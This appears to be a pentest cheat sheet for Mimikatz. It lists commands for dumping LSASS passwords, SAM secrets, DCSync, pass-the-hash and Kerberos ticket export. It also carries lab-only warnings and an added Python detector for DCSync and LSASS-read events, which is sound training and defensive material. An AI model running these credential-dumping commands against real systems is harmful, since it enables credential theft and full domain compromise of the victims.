CyberCheatsheets

Mimikatz Cheat Sheet

Windows credential extraction and Kerberos manipulation (lab-only).

Category: Active Directory & Windows. Tags: credentials, dcsync, lsass, sekurlsa, windows. Updated 2026-06-02

Overview

Mimikatz extracts cleartext passwords, NTLM hashes, Kerberos tickets, and PINs from Windows memory and performs follow-on attacks (Pass-the-Hash, Pass-the-Ticket, DCSync, golden ticket forging). From a defender's perspective it is malware-class tooling regardless of who runs it.

AUTHORIZED LAB / PENTEST ONLY: Use only on:

- Machines you own (personal lab VMs)

- Isolated cyber ranges (HTB, PG, VulnLab, etc.)

- Client environments with explicit written rules of engagement allowing credential access

Never run Mimikatz on employer systems, school networks, friends’ PCs, or production without signed scope. Unauthorized credential theft violates computer fraud laws worldwide. Most EDR will quarantine it instantly.

Install

Run from a high-integrity (Administrator) prompt:

mimikatz.exe

Essential commands

mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
mimikatz # lsadump::sam
mimikatz # token::elevate

Common workflows

Logon passwords from LSASS (requires admin + SeDebugPrivilege) —

privilege::debug
sekurlsa::logonpasswords
sekurlsa::wdigest
sekurlsa::msv

SAM / LSA secrets (local) —

lsadump::sam
lsadump::secrets

DCSync (domain admin — devastating) —

lsadump::dcsync /domain:corp.local /user:Administrator
lsadump::dcsync /domain:corp.local /all /csv

Pass-the-hash / Pass-the-ticket —

sekurlsa::pth /user:administrator /domain:corp.local /ntlm:31d6cfe0d16ae931b73c59d7e0c089c0 /run:cmd.exe
kerberos::ptt <ticket.kirbi>
misc::cmd

Kerberos ticket export —

sekurlsa::tickets /export
kerberos::list /export

Vault / DPAPI (context-dependent) —

vault::list
dpapi::masterkey /in:...
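Detection view of the two workflows above that matter most to defenders, DCSync and LSASS memory reads. This is an added example, not part of the original cheat sheet: it runs simple rules over constructed Security event 4662 and Sysmon event 10 records as they would look after export to JSON (the field names follow the Windows/Sysmon event schema but are assumed here, and the sample records are made up).

```python
# Control-access-right GUIDs that a DCSync-style replication request asks for.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
}

# PROCESS_VM_READ: the access bit needed to read credential material out of LSASS.
PROCESS_VM_READ = 0x0010

def is_dcsync(event, dc_accounts):
    """True for a 4662 whose requested properties include a replication GUID
    and whose subject is not a domain controller account (pass names lowercase)."""
    if event.get("EventID") != 4662:
        return False
    props = event.get("Properties", "").lower()
    if not any(guid in props for guid in REPLICATION_RIGHTS):
        return False
    return event.get("SubjectUserName", "").lower() not in dc_accounts

def is_lsass_access(event):
    """True for a Sysmon ProcessAccess (10) event that reads lsass.exe memory."""
    if event.get("EventID") != 10:
        return False
    if not event.get("TargetImage", "").lower().endswith("\\lsass.exe"):
        return False
    mask = int(event.get("GrantedAccess", "0x0"), 16)
    return bool(mask & PROCESS_VM_READ)

def triage(events, dc_accounts):
    """Return (rule_name, event) pairs for every event that matches a rule."""
    hits = []
    for ev in events:
        if is_dcsync(ev, dc_accounts):
            hits.append(("dcsync", ev))
        elif is_lsass_access(ev):
            hits.append(("lsass_read", ev))
    return hits

# Constructed sample records (not real telemetry): a legitimate DC replication,
# a user account replicating, a tool reading LSASS, and a benign query-only open.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC01$", "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "jdoe", "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 10, "TargetImage": "C:\\Windows\\system32\\lsass.exe", "GrantedAccess": "0x1010", "SourceImage": "C:\\lab\\mimikatz.exe"},
    {"EventID": 10, "TargetImage": "C:\\Windows\\system32\\lsass.exe", "GrantedAccess": "0x1400", "SourceImage": "C:\\Windows\\system32\\svchost.exe"},
]

if __name__ == "__main__":
    for rule, ev in triage(SAMPLE_EVENTS, {"dc01$"}):
        print(rule, ev)
```

The DC account allow-list is the important tuning knob: replication between domain controllers is normal, replication by any other principal is the signal the DCSync workflow above leaves behind.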

Flags reference

privilege::debug - Enable SeDebugPrivilege for the current process
sekurlsa::logonpasswords - Cleartext credentials and hashes from LSASS
lsadump::dcsync - Replicate secrets from a domain controller
sekurlsa::pth - Pass-the-hash
kerberos::golden - Forge a TGT (golden ticket)
crypto::certificates - Work with the certificate store

Tips

  • Ethics (mandatory): treat every Mimikatz run as a full domain compromise event; document it in the report, rotate credentials after the test, and never exfiltrate real user passwords outside scope.
  • Modern Windows with Credential Guard and LSA Protection (PPL) blocks naive LSASS reads; labs teach bypasses, but do not use them on unauthorized systems.
  • Prefer other assessment tooling when the engagement allows it (Impacket secretsdump, Rubeus, the lsassy module); these are still sensitive but often better logged and controlled.
  • Delete dumps and *.kirbi files after the lab; never commit secrets to git.
  • For learning, use dedicated vulnerable AD labs (e.g., GOAD, vulnerable AD ranges) with snapshots.
